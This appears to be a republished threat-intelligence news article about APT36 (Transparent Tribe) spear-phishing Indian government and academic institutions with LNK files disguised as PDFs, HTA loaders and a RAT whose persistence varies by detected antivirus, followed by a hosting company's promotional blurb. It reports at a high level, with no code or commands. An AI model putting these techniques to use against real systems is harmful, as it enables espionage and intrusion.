The hacker group known as Transparent Tribe has launched a new series of attacks targeting Indian government and academic institutions, utilizing a remote access trojan (RAT) to maintain persistent control over compromised machines.
In a report by CYFIRMA, it was revealed that the attacks are sophisticated, employing deceptive delivery methods. Specifically, the attackers send emails containing a ZIP file that disguises a Windows shortcut (LNK) file as a legitimate PDF document, successfully embedding the actual PDF content to minimize user suspicion.
Known also as APT36, Transparent Tribe has been active in cyber espionage against Indian organizations since at least 2013. They continually adapt their toolkit, utilizing various RATs over the years, such as CapraRAT, Crimson RAT, ElizaRAT, and DeskRAT. The latest attacks begin with spear-phishing emails that include a ZIP file containing a harmful LNK file. When activated, this file runs a remote HTML Application (HTA) script via "mshta.exe," which decrypts and loads the RAT payload directly into memory, while simultaneously showing a decoy PDF document to prevent raising alarms among users.
One notable feature of the malware is its capability to adjust its persistence methods based on the antivirus software detected on the infected system. For instance:
- If Kaspersky is identified, it establishes persistence by creating a working directory and dropping an obfuscated HTA file into the Windows Startup folder.
- If Quick Heal is detected, it uses a batch file and a malicious LNK file in the Startup folder for persistence.
- For Avast, AVG, or Avira, it directly copies the payload into the Startup directory.
- In the absence of recognized antivirus solutions, it resorts to a combination of batch file execution and registry manipulation for maintaining persistence.
Additionally, the HTA file includes a DLL named "iinneldc.dll," which functions as a fully-featured RAT, providing remote system control, file management, data exfiltration, and more.
Despite the challenges, APT36 continues to be a determined and strategic cyber-espionage threat, focusing on intelligence collection from Indian governmental and educational spheres.
In recent weeks, APT36 has also been linked to another campaign that utilized a malicious shortcut file disguised as a government advisory PDF to drop a .NET-based loader, which facilitated further execution of malware and maintained long-term control over the target systems.
The shortcut executes a command that retrieves an MSI installer from a remote server, initiating actions that include displaying a decoy PDF, storing additional DLL files, and establishing persistence through registry modifications.
As the landscape of cyber threats continues to evolve, Transparent Tribe shows no signs of slowing down, leveraging advanced techniques to carry out its espionage activities against Indian targets.
Welcome to DediRock, your trusted partner in high-performance hosting solutions. At DediRock, we specialize in providing dedicated servers, VPS hosting, and cloud services tailored to meet the unique needs of businesses and individuals alike. Our mission is to deliver reliable, scalable, and secure hosting solutions that empower our clients to achieve their digital goals. With a commitment to exceptional customer support, cutting-edge technology, and robust infrastructure, DediRock stands out as a leader in the hosting industry. Join us and experience the difference that dedicated service and unwavering reliability can make for your online presence. Launch our website.